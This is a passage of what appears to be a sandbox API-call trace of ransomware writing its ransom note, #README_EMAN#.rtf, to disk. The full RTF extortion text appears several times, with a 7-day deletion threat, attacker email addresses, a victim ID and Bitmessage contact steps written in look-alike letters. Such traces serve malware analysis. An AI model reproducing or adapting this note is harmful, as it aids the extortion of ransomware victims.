"c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cy-gb\\#readme_eman#.rtf")) returned 0xffffffff [0298.795] GetLastError () returned 0x2 [0298.795] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cy-gb\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cy-gb\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.795] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.796] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.796] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. 